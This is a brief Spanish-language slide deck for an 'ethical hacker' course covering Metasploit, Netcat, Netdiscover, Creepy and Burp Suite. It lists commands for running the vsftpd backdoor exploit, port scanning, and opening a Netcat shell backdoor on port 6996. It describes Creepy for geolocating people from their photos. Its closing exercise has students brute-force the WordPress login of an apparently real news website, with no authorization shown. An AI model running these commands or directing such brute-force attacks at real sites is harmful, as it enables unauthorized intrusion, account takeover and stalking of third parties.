CNDP Etchical Hacker

Jose G. Rodriguez

Agenda
Metasploit Scapy Ncat Netdiscover Creepy Burp Suite

Metasploit
Cuando de seguridad se trata, la revelacin pblica de vulnerabilidades y del cdigo de explotacin que funciona son hoy en da una cosa habitual. Vemos por qu esto puede ser tanto perjudicial como til para asegurar nuestros sistemas.

Metasploit
Empezamos primero subiendo los servicios: service postgresql start service metasploit start Luego: msfconsole

Metasploit
msf> use <el exploit necesario> msf> use exploit/unix/ftp/vsftpd_234_backdoor Msf> show options Msf > set <parmetro> <valor> msf> exploit

Information gathering con Metasploit

db_nmap {direccin ip} -p 1-65535 , el comando lo que haces es un escaneo de puertos del objetivo. db_nmap sV {direccin ip} p {puerto de inters}, se determina la version especifica del sistema.

Netcat
Conocido como el Swiss Army knife of hacking tools. Netcat es usado para Banner Grab del OS Fingerprinting ej: Netcat 200.42.213.11 80

Netcat
Para escuchar conecciones netcat -l -p 6996 Crear backdoors nc -l -p 6996 -e /bin/bash

Netdiscover
Herramienta activa/pasiva para reconocer redes sin DHCP, cuando se esta haciendo wardriving. netdiscover -i wlan0 (Auto Discover redes) netdiscover -i wlan0 -r 10.0.0.0/8

Creepy
Es una herramienta de geolocalizacin de fotos, accesible desde la API del servicio de alojamiento de imgenes y a las etiquetas EXIF de las fotos publicadas, eso tambin incluye servicios de alojamientos de imgenes como Flickr, Yfrog o Twitpic

Creepy

Burp Suite
Una herramienta de intrusin, para realizar poderosos ataques personalizados de encontrar y explotar vulnerabilidades inusuales.

http://www.kontrol0.com/2013/06/f uerza-bruta-con-burpsuit.html

Fuerza bruta con Burp Suite

Realizar el siguiente ejercicio: http://www.kontrol0.com/2013/06/fuerzabruta-con-burpsuit.html Hacia el site http://www.noticiassin.com/wp-login.php